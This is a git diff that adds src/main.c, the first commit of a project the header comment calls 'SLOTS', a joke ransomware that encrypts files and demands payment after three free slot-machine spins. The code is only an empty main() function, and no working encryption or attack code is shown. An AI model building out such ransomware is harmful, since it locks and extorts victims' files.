diff options
Diffstat (limited to 'src/main.c')
| -rw-r--r-- | src/main.c | 15 |
1 files changed, 15 insertions, 0 deletions
diff --git a/src/main.c b/src/main.c new file mode 100644 index 0000000..6e0bc8f --- /dev/null +++ b/src/main.c | |||
| @@ -0,0 +1,15 @@ | |||
| 1 | /*** | ||
| 2 | * SLOTS - Feelin' Lucky? | ||
| 3 | * | ||
| 4 | * SLOTS is ransomware that uses (shitty) encryption to "encourage" the reluctant gambler. You get 3 free spins to get a jackpot, further spins "cost" money. | ||
| 5 | * This malware is meant primarily as a joke, not as something meant to damage someone's system. While it CAN damage someone's computer and lock their files away, it | ||
| 6 | * also prints out the key required to decrypt affected files if someone isn't too keen on losing their shit | ||
| 7 | * | ||
| 8 | * | ||
| 9 | */ | ||
| 10 | |||
| 11 | int main() { | ||
| 12 | |||
| 13 | |||
| 14 | return 0; | ||
| 15 | } \ No newline at end of file | ||
